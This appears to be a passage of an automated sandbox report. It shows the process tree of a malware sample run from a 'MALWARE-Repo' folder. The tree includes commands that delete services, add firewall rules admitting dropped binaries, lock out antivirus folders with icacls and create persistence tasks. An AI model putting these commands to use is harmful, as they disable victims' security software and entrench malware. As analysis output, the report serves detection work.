    3⤵
    PID:1728
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:2080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    PID:4988
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    PID:4000
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      PID:4348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    PID:4292
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:2348
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    PID:1800
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      PID:3396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    PID:1592
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      PID:3516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    PID:3524
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:3508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    PID:2100
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      PID:640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:1180
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:156
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      PID:3116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    PID:3548
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      PID:3328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:4704
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:3468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:884
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:4756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    PID:320
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      PID:4672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:2448
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:3776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:4664
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:3572
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:4992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:3908
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      PID:2944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:1620
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:268
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:4892
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:4268
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:4340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    PID:536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    PID:1920
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      PID:2260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2396
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    PID:3276
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    PID:896
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2368
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:2988
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3152
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    PID:4228
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2392
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:4072
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4296
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:4860
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
    3⤵
    PID:572
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:2080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
    3⤵
    PID:4280
  - - C:\Windows\SysWOW64\icacls.exe
      icacls c:\programdata\Malwarebytes /deny System:(F)
      4⤵
      Modifies file permissions
      PID:1768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
    3⤵
    PID:1364
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny Admin:(F)
      4⤵
      Modifies file permissions
      PID:2060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
    3⤵
    PID:3004
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\MB3Install /deny System:(F)
      4⤵
      Modifies file permissions
      PID:832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1208
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
    3⤵
    PID:1772
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2096
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
    3⤵
    PID:2660
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3368
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4344
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3092
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
    3⤵
    PID:2516
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2356
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2156
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2588
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2508
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4428
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4252
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3080
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4184
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2800
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4300
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3312
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1612
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4576
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4648
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:3380
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:5000
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    3⤵
    PID:4624
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3280
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:4264
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:4176
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:5020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2792
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    3⤵
    PID:3784
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1360
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2608
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1524
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1216
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4968
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2712
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3004
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:2380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:692
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:1556
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    3⤵
    PID:3200
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2196
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
      4⤵
      Modifies file permissions
      PID:3676
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    3⤵
    - Creates scheduled task(s)
    PID:4040
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3288
- C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\HawkEye.exe
